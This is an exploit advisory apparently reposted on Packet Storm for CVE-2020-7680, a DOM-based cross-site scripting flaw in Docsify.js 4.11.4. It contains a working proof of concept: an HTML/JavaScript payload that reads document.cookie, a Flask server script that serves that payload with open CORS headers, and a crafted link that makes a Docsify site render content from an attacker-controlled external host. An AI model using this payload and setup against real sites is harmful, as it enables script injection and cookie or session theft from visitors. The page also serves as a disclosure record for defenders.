what you don't know can hurt you

Docsify.js 4.11.4 Cross Site Scripting

Docsify.js 4.11.4 Cross Site Scripting
Posted Jul 22, 2020
Authored by Amin Sharifi

Docsify.js version 4.11.4 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2020-7680
MD5 | c04ce1f9ca28c7b5d05da5e1c5f7e216

Docsify.js 4.11.4 Cross Site Scripting

Change Mirror Download
# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting
# Date: 2020-06-22
# Exploit Author: Amin Sharifi
# Vendor Homepage: https://docsify.js.org
# Software Link: https://github.com/docsifyjs/docsify
# Version: 4.11.4
# Tested on: Windows 10
# CVE : CVE-2020-7680


docsify.js uses fragment identifiers (parameters after # sign) to load
resources from server-side .md files. it then renders the .md file inside
the HTML page.

For example : https://docsify.js.org/#/quickstart sends an ajax to
https://docsify.js.org/quickstart.md and renders it inside the html page.

due to lack of validation it is possible to provide external URLs after the
/#/ and render arbitrary javascript/HTML inside the page which leads to
DOM-based Cross Site Scripting (XSS).


Steps to reproduce:

step 1. setup a server (for example I use flask here, for the POC im
hosting one on https://asharifi.pythonanywhere.com )

step 2. the server should respond to request to /README.md with a crafted
XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>"
also the CORS should be set so that other Origins would be able to send
ajax requests to the server so Access-Control-Allow-Origin must be set to *
(or to the specific domain that you wanna exploit) example code below:

-------------------------------------------------
from flask import Flask
import flask

app = Flask(__name__)


@app.route('/README.md')
def inject():
resp = flask.Response("Html Injection and XSS PoC</p><img src=1
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>")
resp.headers['Access-Control-Allow-Origin'] = '*'
return resp

------------------------------------------------------
step 3. craft the link for execution of the exploit
for example for https://docsify.js.org website you can create the link as
below

https://docsify.js.org/#//asharifi.pythonanywhere.com/README
(note that the mentioned domain is no longer vulnerable at the time writing
this report)

when a user visits this URL an ajax request will be sent to
asharifi.pythonanywhere.com/README.md and the response of the request will
be rendered inside the webpage which results in XSS payload being executed
on the page.


snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099
Mitre CVE entry:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680
Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    11 Files
  • 12
    Aug 12th
    11 Files
  • 13
    Aug 13th
    17 Files
  • 14
    Aug 14th
    3 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close